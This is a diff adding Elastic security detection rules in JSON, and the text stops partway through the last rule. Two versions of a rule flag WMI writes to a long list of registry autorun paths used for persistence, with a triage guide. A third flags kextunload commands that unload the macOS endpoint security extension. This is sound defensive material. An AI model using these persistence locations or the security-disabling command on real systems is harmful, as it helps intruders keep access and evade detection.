diff --git a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_107.json b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_107.json
new file mode 100644
index 00000000000..16205275ed5
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_107.json
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Windows Management Instrumentation StdRegProv (registry provider) to modify commonly abused registry locations for persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via WMI Standard Registry Provider", + "note": "## Triage and analysis\n\n### Investigating Persistence via WMI Standard Registry Provider\n\nThe Windows Management Instrumentation (WMI) StdRegProv is a registry provider that allows users to manage registry keys and values on Windows systems. Adversaries may abuse this functionality to modify registry locations commonly used for persistence, enabling them to maintain unauthorized access to a system.\n\nThis rule identifies instances where the WMI StdRegProv is used to modify specific registry paths associated with persistence mechanisms.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify which process triggered this behavior.\n- Verify whether the file specified in the run key is signed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Examine the file specified in the run key using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' 
OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.data.strings != null and process.name : \"WmiPrvSe.exe\" and\n registry.path : (\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n 
\"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n 
\"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Environment\\\\UserInitMprLogonScript\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\"\n )\n", + "references": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/regprov/stdregprov", + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": 
"registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + }, + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_108.json b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_108.json new file mode 100644 index 00000000000..5ca7f940618 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_108.json 
@@ -0,0 +1,117 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies use of the Windows Management Instrumentation StdRegProv (registry provider) to modify commonly abused registry locations for persistence.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.registry-*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Persistence via WMI Standard Registry Provider",
+ "note": "## Triage and analysis\n\n### Investigating Persistence via WMI Standard Registry Provider\n\nThe Windows Management Instrumentation (WMI) StdRegProv is a registry provider that allows users to manage registry keys and values on Windows systems. Adversaries may abuse this functionality to modify registry locations commonly used for persistence, enabling them to maintain unauthorized access to a system.\n\nThis rule identifies instances where the WMI StdRegProv is used to modify specific registry paths associated with persistence mechanisms.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify which process triggered this behavior.\n- Verify whether the file specified in the run key is signed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Examine the file specified in the run key using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' 
OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "registry where host.os.type == \"windows\" and\n registry.data.strings != null and process.name : \"WmiPrvSe.exe\" and\n registry.path : (\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n 
\"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n 
\"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Environment\\\\UserInitMprLogonScript\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\"\n )\n",
+ "references": [
+ "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/regprov/stdregprov",
+ "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "registry.data.strings",
+ "type": "wildcard"
+ },
+ {
+ "ecs": true,
+ "name": 
"registry.path",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6",
+ "severity": "high",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1543",
+ "name": "Create or Modify System Process",
+ "reference": "https://attack.mitre.org/techniques/T1543/",
+ "subtechnique": [
+ {
+ "id": "T1543.003",
+ "name": "Windows Service",
+ "reference": "https://attack.mitre.org/techniques/T1543/003/"
+ }
+ ]
+ },
+ {
+ "id": "T1547",
+ "name": "Boot or Logon Autostart Execution",
+ "reference": "https://attack.mitre.org/techniques/T1547/",
+ "subtechnique": [
+ {
+ "id": "T1547.001",
+ "name": "Registry Run Keys / Startup Folder",
+ "reference": "https://attack.mitre.org/techniques/T1547/001/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1047",
+ "name": "Windows Management Instrumentation",
+ "reference": "https://attack.mitre.org/techniques/T1047/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 108
+ },
+ "id": "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_108",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_106.json b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_106.json
new file mode 100644
index 00000000000..d5b44dc6222
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_106.json
@@ -0,0 +1,111 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies attempts to unload the Elastic Endpoint Security kernel extension via the kextunload command.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Attempt to Unload Elastic Endpoint Security Kernel Extension",
+ "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:kextunload and process.args:(\"/System/Library/Extensions/EndpointSecurity.kext\" or \"EndpointSecurity.kext\")\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "70fa1af4-27fd-4f26-bd03-50b6af6b9e24",
+ "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper 